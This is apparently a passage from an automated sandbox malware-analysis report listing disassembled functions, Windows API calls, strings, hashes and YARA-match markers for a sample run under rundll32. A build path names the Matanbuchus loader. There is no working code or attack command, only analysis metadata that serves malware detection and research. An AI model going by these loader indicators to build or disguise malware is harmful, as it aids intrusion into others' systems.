                          • Instruction ID: 1712a73c1767e3a4541d6aa7ab87172b3c5f0fe412620377262557e73298a38e
                          • Opcode Fuzzy Hash: 6a943e723d05462264b23a934d8152496b171346689aee6a0be14f64edae570b
                          • Instruction Fuzzy Hash: B2127574E04298DEDF14CFAAC9827ADBBB5BB4A304F10819AD449E7B50E7358A85CF14
                          Function 7EF50E11 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • type_info::operator==.LIBVCRUNTIME ref: 7EF50F30
                          • ___TypeMatch.LIBVCRUNTIME ref: 7EF5103E
                          • _UnwindNestedFrames.LIBCMT ref: 7EF51190
                          • CallUnexpected.LIBVCRUNTIME ref: 7EF511AB
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                          • String ID: csm$csm$csm
                          • API String ID: 2751267872-393685449
                          • Opcode ID: 7051ccc45399eb233ef41ca899d8f24921ea2b70e3cdb542da1ba045c7caceef
                          • Instruction ID: 209a0962610081efdc662527b8ef7c0cca2fc2d5ba971b3d871683d25d672845
                          • Opcode Fuzzy Hash: 7051ccc45399eb233ef41ca899d8f24921ea2b70e3cdb542da1ba045c7caceef
                          • Instruction Fuzzy Hash: 85B1A079800A09DFCF15CFA0C86099EBBBAFF24314F10499AE8166BB05D731EA51CF91
                          Function 6CC78480 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 6CC784B7
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 6CC784BF
                          • _ValidateLocalCookies.LIBCMT ref: 6CC78548
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 6CC78573
                          • _ValidateLocalCookies.LIBCMT ref: 6CC785C8
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210625828.000000006CC51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CC50000, based on PE: true
                          • Associated: 00000003.00000002.2210605097.000000006CC50000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210655307.000000006CC83000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210672778.000000006CC91000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210777648.000000006CF27000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210910682.000000006D0F9000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.2210926789.000000006D0FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_6cc50000_rundll32.jbxd
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm$csm
                          • API String ID: 1170836740-3733052814
                          • Opcode ID: f1c352e5cf00f87b656aeada9664054c4056c662b92bdc2c6e5df2a5884829fd
                          • Instruction ID: 7bf1b60ee428c11b7d7ca26777f0b1d7c8fb92b9989f59cab5eb6a6dea422a97
                          • Opcode Fuzzy Hash: f1c352e5cf00f87b656aeada9664054c4056c662b92bdc2c6e5df2a5884829fd
                          • Instruction Fuzzy Hash: 51516B34A01204EFDF60CF69C844E9E7BB5FF45328F14819AD9246BB91E731DA15CBA1
                          Function 7EF6D253 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 147COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,7EF6CBBF), ref: 7EF6D26C
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer
                          • String ID: acos$asin$log$log10$pow$sqrt
                          • API String ID: 3527080286-3190521889
                          • Opcode ID: 8929c68cdba4b8df096d6bdc623c29c28318381c5b7046500c3a8184f18d5943
                          • Instruction ID: 5cacb25f921fe6c9fa9b50f2679111f00f819134a016acefcf5ad14fc699ac88
                          • Opcode Fuzzy Hash: 8929c68cdba4b8df096d6bdc623c29c28318381c5b7046500c3a8184f18d5943
                          • Instruction Fuzzy Hash: 3851B27990050ACBDF01BF6AD4681AD7FB4FB45310F524097D892EAE6CCB728931CB55
                          Function 7EF166F0 Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 244COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: S$lqmqxj3IPM1//0.$w$}
                          • API String ID: 0-71832097
                          • Opcode ID: 4b0a30671ce11248be2a69ddfe95032fc7b990b9852c650c159e577dc2f88119
                          • Instruction ID: ae1a04c78dcd57bbc234752425897513282e021bf3e11462b3f2e16cd84a3945
                          • Opcode Fuzzy Hash: 4b0a30671ce11248be2a69ddfe95032fc7b990b9852c650c159e577dc2f88119
                          • Instruction Fuzzy Hash: 7CB12478D0828DDFEB01CF98C864BDDBBB1AF49304F104159E949AB381D7B96A45CB62
                          Function 7EF4DB5F Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • __RTC_Initialize.LIBCMT ref: 7EF4DBA6
                          • ___scrt_uninitialize_crt.LIBCMT ref: 7EF4DBC0
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Initialize___scrt_uninitialize_crt
                          • String ID:
                          • API String ID: 2442719207-0
                          • Opcode ID: 8c6dec8a4a589df46136e51810eab56b65d2911ccd364afe93540a0b1d7695dc
                          • Instruction ID: 2fc8be84e7e1bc4493960aea0584092bbdc0ef70eabaa4137e7b26a0630ed43c
                          • Opcode Fuzzy Hash: 8c6dec8a4a589df46136e51810eab56b65d2911ccd364afe93540a0b1d7695dc
                          • Instruction Fuzzy Hash: 8241377AE08215EFDB529F55CC20F6E3EF5EF82654F10691BE815ABA50C77249018BA0
                          Function 7EF50840 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                          Download Yara Rule
                          APIs
                          • _ValidateLocalCookies.LIBCMT ref: 7EF50877
                          • ___except_validate_context_record.LIBVCRUNTIME ref: 7EF5087F
                          • _ValidateLocalCookies.LIBCMT ref: 7EF50908
                          • __IsNonwritableInCurrentImage.LIBCMT ref: 7EF50933
                          • _ValidateLocalCookies.LIBCMT ref: 7EF50988
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                          • String ID: csm
                          • API String ID: 1170836740-1018135373
                          • Opcode ID: 50c7ea7ce0383fe4203b4302dea43d885cbafc4799eecc1424d07145c66ae5c0
                          • Instruction ID: a2876835fafbe2b4925cb6494a42a32bb641204b56c9eb784f8d77a57cc8dec9
                          • Opcode Fuzzy Hash: 50c7ea7ce0383fe4203b4302dea43d885cbafc4799eecc1424d07145c66ae5c0
                          • Instruction Fuzzy Hash: C341F538A00608DBCF00DF69C860A9E7BF5BF55318F108596EC165BB95E771AA15CB90
                          Function 7EF41260 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF412DF
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF412F9
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF41313
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF4132D
                          Strings
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EF41349
                          • false, xrefs: 7EF4134E
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::bad_exception::bad_exception
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                          • API String ID: 2160870905-4036550669
                          • Opcode ID: 3462c7713ef20dd1f5a7031d8816f923e955606d13c93c4825dea43438580a67
                          • Instruction ID: 8a457efe6a43b8c234c56ae5bccbcbbc2d9e446c71bddfa2612d9ad2627639b4
                          • Opcode Fuzzy Hash: 3462c7713ef20dd1f5a7031d8816f923e955606d13c93c4825dea43438580a67
                          • Instruction Fuzzy Hash: C521D379A04208EBDB04DFA4DCB0EEE7775AF55300F14895EE9526BA40DF31BA15DB10
                          Function 7EF41380 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF413FF
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF41419
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF41433
                          • std::bad_exception::bad_exception.LIBCMTD ref: 7EF4144D
                          Strings
                          • B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp, xrefs: 7EF41469
                          • false, xrefs: 7EF4146E
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::bad_exception::bad_exception
                          • String ID: B:\Loader\Matanbuchus\Main module\Belial project\MatanbuchusLoader\MatanbuchusLoaderFiles\Matanbuchus\json.hpp$false
                          • API String ID: 2160870905-4036550669
                          • Opcode ID: 9e7aed4b9b587b1fa78b454ee817191d7ade12e2f3e225e04b0991b72d31c28d
                          • Instruction ID: 5b27a7aec18c187c9aba5a39c55c82a125fb4612eb7cfe6a6fff8f9619336b52
                          • Opcode Fuzzy Hash: 9e7aed4b9b587b1fa78b454ee817191d7ade12e2f3e225e04b0991b72d31c28d
                          • Instruction Fuzzy Hash: 7321D379A04208EBCB08DFA4DCB0EDE77B5AF55300F10895EE9526BA40DF31BA05DB10
                          Function 7EF60C9C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • FreeLibrary.KERNEL32(00000000,?,7EF60DA9,7EF5DD78,0000000C,7EF72040,00000000,00000000,?,7EF60FF6,00000021,FlsSetValue,7EF7A8C0,7EF7A8C8,7EF72040), ref: 7EF60D5D
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FreeLibrary
                          • String ID: api-ms-$ext-ms-
                          • API String ID: 3664257935-537541572
                          • Opcode ID: 54668b2607ef4357db9fc29b19d8721be9a403ff8ea7ec88516820ab02ca3eb6
                          • Instruction ID: 77d5ab7a17638a90ea47ab2882601d98a964652089199b2489f22d7a56a33915
                          • Opcode Fuzzy Hash: 54668b2607ef4357db9fc29b19d8721be9a403ff8ea7ec88516820ab02ca3eb6
                          • Instruction Fuzzy Hash: 4321937BA01111EBD722AA66DC60B4A77B9EF41768F310225ED17A7A85DB30FD01C7E0
                          Function 7EF4D13C Relevance: 9.2, APIs: 6, Instructions: 175COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 7EF4D185
                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 7EF4D1F0
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7EF4D20D
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 7EF4D24C
                          • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 7EF4D2AB
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 7EF4D2CE
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiStringWide
                          • String ID:
                          • API String ID: 2829165498-0
                          • Opcode ID: 450a545717da107491bcc14b373f3611553af121f85eb183db843374bf14080c
                          • Instruction ID: 0638f48e2e83f1d70cc3cdf8839855e11b71b82ca79a78dfb4088496591bd74b
                          • Opcode Fuzzy Hash: 450a545717da107491bcc14b373f3611553af121f85eb183db843374bf14080c
                          • Instruction Fuzzy Hash: 8351C07660020AEFEF519F61CC60FAB3FB9EF86640F12452AFD0296944D732DA10CB60
                          Function 7EF50AA3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetLastError.KERNEL32(00000001,?,7EF509C2,7EF4D53B,7EF4DA30,?,7EF4DC68,?,00000001,?,?,00000001,?,7EF82608,0000000C,7EF4DD61), ref: 7EF50AB1
                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 7EF50ABF
                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 7EF50AD8
                          • SetLastError.KERNEL32(00000000,7EF4DC68,?,00000001,?,?,00000001,?,7EF82608,0000000C,7EF4DD61,?,00000001,?), ref: 7EF50B2A
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorLastValue___vcrt_
                          • String ID:
                          • API String ID: 3852720340-0
                          • Opcode ID: b62658cb2aa6749d1cf8e381325199e0e7de5f5ed03f4324450ccbeab9ae2869
                          • Instruction ID: 2a7a2ea2fe7ff8d7eb90ab1cc1750a48ce7c1507e60b69d06c28a61d71a075ef
                          • Opcode Fuzzy Hash: b62658cb2aa6749d1cf8e381325199e0e7de5f5ed03f4324450ccbeab9ae2869
                          • Instruction Fuzzy Hash: 5001D23B20CA26EEE31626A6ACB8A5A37E4EB22278720072BE412D1ED0FB1148004544
                          Function 7EF5BEB5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetStdHandle.KERNEL32(000000F4,?,00003C16), ref: 7EF5BED5
                          • GetFileType.KERNEL32(00000000,?,00003C16), ref: 7EF5BEE7
                          • swprintf.LIBCMT ref: 7EF5BF08
                          • WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,00003C16), ref: 7EF5BF45
                          Strings
                          • Assertion failed: %Ts, file %Ts, line %d, xrefs: 7EF5BEFD
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ConsoleFileHandleTypeWriteswprintf
                          • String ID: Assertion failed: %Ts, file %Ts, line %d
                          • API String ID: 2943507729-1719349581
                          • Opcode ID: 1faa53f808ccdbb83d99e0ab46910d701f5ac0244bed0ac6dc214279e802c0dc
                          • Instruction ID: 76f8c46f02371c7edc1aeb6838a0b940dc2fc12f5728f0bf4652b82d28e716bf
                          • Opcode Fuzzy Hash: 1faa53f808ccdbb83d99e0ab46910d701f5ac0244bed0ac6dc214279e802c0dc
                          • Instruction Fuzzy Hash: 6511047A500518EBCB10AF65CC54ADF77FCEF84210F904999EA1B93684EB30AE458F60
                          Function 7EF5D45A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,1B62296B,7EF72040,?,00000000,7EF70873,000000FF,?,7EF5D3EA,7D83FC4D,?,7EF5D3BE,7EF72040), ref: 7EF5D48F
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 7EF5D4A1
                          • FreeLibrary.KERNEL32(00000000,?,00000000,7EF70873,000000FF,?,7EF5D3EA,7D83FC4D,?,7EF5D3BE,7EF72040), ref: 7EF5D4C3
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: b0b87be0dce5053cd5c03c58e6e987f3adde70603b0e5200c49365a7e34d41bf
                          • Instruction ID: dabc6f6be1fb891d145d6c087412a0bc210009fc01dd71d27bcef7a046357145
                          • Opcode Fuzzy Hash: b0b87be0dce5053cd5c03c58e6e987f3adde70603b0e5200c49365a7e34d41bf
                          • Instruction Fuzzy Hash: 7701A736905515EFDB019B51CC14BBFBBB8FF44755F408626EC23A2B90DB759900CA90
                          Function 7EF05AA0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7EF05AC7
                          • int.LIBCPMTD ref: 7EF05AE0
                            • Part of subcall function 7EF0AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7EF0AD26
                            • Part of subcall function 7EF0AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7EF0AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7EF05B27
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7EF05BBB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          • Opcode ID: b229d6af337e7f16fa7cf8ecc9a629252d6e9711bbaf080c59d2e1ff197f6a0e
                          • Instruction ID: a6c69d62c90c4479dc31f30b33a09f9580d15e36ef2cf1400b1201a8b2e9db60
                          • Opcode Fuzzy Hash: b229d6af337e7f16fa7cf8ecc9a629252d6e9711bbaf080c59d2e1ff197f6a0e
                          • Instruction Fuzzy Hash: 7041C4B9D05609DFCB04CF98D990AEEFBB5FF48314F20861AD815A7790DB346A41CBA1
                          Function 7EF05BE0 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7EF05C07
                          • int.LIBCPMTD ref: 7EF05C20
                            • Part of subcall function 7EF0AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7EF0AD26
                            • Part of subcall function 7EF0AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7EF0AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7EF05C67
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7EF05CFB
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          • Opcode ID: f026ba579034ba48f5267585f2edf49d9a48294154bf5ff38415952480258749
                          • Instruction ID: d908059761c2f98179c5522c561ac1018f5f81096dc74b94ba5fd9ff0ab58f1f
                          • Opcode Fuzzy Hash: f026ba579034ba48f5267585f2edf49d9a48294154bf5ff38415952480258749
                          • Instruction Fuzzy Hash: 3641D8B9D04609DFCB04CF94D590AEEBBB1FF48314F20861AD815B7790D7746A41CBA1
                          Function 7EF05960 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                          Download Yara Rule
                          APIs
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7EF05987
                          • int.LIBCPMTD ref: 7EF059A0
                            • Part of subcall function 7EF0AD10: std::_Lockit::_Lockit.LIBCPMT ref: 7EF0AD26
                            • Part of subcall function 7EF0AD10: std::_Lockit::~_Lockit.LIBCPMT ref: 7EF0AD50
                          • Concurrency::cancel_current_task.LIBCPMTD ref: 7EF059E7
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7EF05A7B
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Concurrency::cancel_current_task
                          • String ID:
                          • API String ID: 3053331623-0
                          • Opcode ID: 8e4ba07e8060f6448f926defe8a1238f26a9e627b8e77dbdf3bfe53451ca9dff
                          • Instruction ID: 6ac455f6daa63b41322bdb3de429d260fb5392109201df1d8358920486809f14
                          • Opcode Fuzzy Hash: 8e4ba07e8060f6448f926defe8a1238f26a9e627b8e77dbdf3bfe53451ca9dff
                          • Instruction Fuzzy Hash: 5641D4B9D04609DFCB04CF98C990AEEBBB1BF48310F20861AD815A7790DB346A45CFA1
                          Function 7EF4DC0F Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: dllmain_raw$dllmain_crt_dispatch
                          • String ID:
                          • API String ID: 3136044242-0
                          • Opcode ID: 6322e4daa84e612708df772dc010e6553398dc092d07bc94426670bd39472bef
                          • Instruction ID: abf0ad4c591b68668e5334670e7b15599a0d77e25d053f10e7729ae74cb9ee8b
                          • Opcode Fuzzy Hash: 6322e4daa84e612708df772dc010e6553398dc092d07bc94426670bd39472bef
                          • Instruction Fuzzy Hash: EC21F37AD05229EFDB529F15C860E6F3EB9EB87694B016517FC0697A14C3328D018BA0
                          Function 7EF4CA04 Relevance: 7.5, APIs: 5, Instructions: 44COMMON
                          Download Yara Rule
                          APIs
                          • __EH_prolog3.LIBCMT ref: 7EF4CA0B
                          • std::_Lockit::_Lockit.LIBCPMT ref: 7EF4CA16
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 7EF4CA84
                            • Part of subcall function 7EF4CB67: std::locale::_Locimp::_Locimp.LIBCPMT ref: 7EF4CB7F
                          • std::locale::_Setgloballocale.LIBCPMT ref: 7EF4CA31
                          • _Yarn.LIBCPMT ref: 7EF4CA47
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                          • String ID:
                          • API String ID: 1088826258-0
                          • Opcode ID: 97608d2406813fb438f5c945b31bde546590c14d356885c4c8c7bed250639368
                          • Instruction ID: da67d92bf068d153aeae841bd4e713b840fa319a934ce5ae09b925f0b7bb420a
                          • Opcode Fuzzy Hash: 97608d2406813fb438f5c945b31bde546590c14d356885c4c8c7bed250639368
                          • Instruction Fuzzy Hash: C701BC7EA04110DBE706EF20C864A7C7FB1BF86610B24640AD82357B80CB74AA41CBD5
                          Function 7EF4C01A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,7EF1D366), ref: 7EF4C055
                          • CloseHandle.KERNEL32(7EF1D366), ref: 7EF4C0FF
                          • CloseHandle.KERNEL32(?), ref: 7EF4C109
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreateProcess
                          • String ID: ?
                          • API String ID: 2922976086-1684325040
                          • Opcode ID: 4f2384a9436d25ffc96129f906a5636cabf924693346ca65761d173bc8c8c27f
                          • Instruction ID: 4fa75cecd10338e56b9d2ecb532d6f31387b1179f527dca3bb10669ced0e572f
                          • Opcode Fuzzy Hash: 4f2384a9436d25ffc96129f906a5636cabf924693346ca65761d173bc8c8c27f
                          • Instruction Fuzzy Hash: 5321B479904119FBEF229EA6CC14EBF7FBDEBC6700F106469F905A1460EB318A54CA60
                          Function 7EF51BF2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,7EF51BA3,00000000,?,00000001,?,?,?,7EF51C92,00000001,FlsFree,7EF77E5C,FlsFree), ref: 7EF51BFF
                          • GetLastError.KERNEL32(?,7EF51BA3,00000000,?,00000001,?,?,?,7EF51C92,00000001,FlsFree,7EF77E5C,FlsFree,00000000,?,7EF50BAF), ref: 7EF51C09
                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 7EF51C31
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: LibraryLoad$ErrorLast
                          • String ID: api-ms-
                          • API String ID: 3177248105-2084034818
                          • Opcode ID: 9bfe1815f20eef6f12810aa6cf48fd323e4596f068184ab50fcde6092f83691d
                          • Instruction ID: 6b12ef66378260f037ec861801f5c991ca284fdd6c394fe548b8cb840b6c6b74
                          • Opcode Fuzzy Hash: 9bfe1815f20eef6f12810aa6cf48fd323e4596f068184ab50fcde6092f83691d
                          • Instruction Fuzzy Hash: F1E04F36280608F7EB112E61EC19F493AA9BF60B45F604031F90EE89D0E777E8208D84
                          Function 7EF4C590 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(ntdll.dll,RtlRandomEx,?,7EF4C377,?,?,?,7EF4BBCC,?,0000000F,?,00000000,00000208), ref: 7EF4C5A6
                          • GetProcAddress.KERNEL32(00000000), ref: 7EF4C5AD
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2210962093.000000007EEF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 7EEF0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7eef0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: RtlRandomEx$ntdll.dll
                          • API String ID: 1646373207-4284430886
                          • Opcode ID: f94e89ed20f696a89cd8f0c6029b3a0babcb809c71abac5e3d9ff9cb2f3ea02a
                          • Instruction ID: e8b2493d760eb37303926138ecd29be95d323fa81a1b32a413974a1ab3d452f7
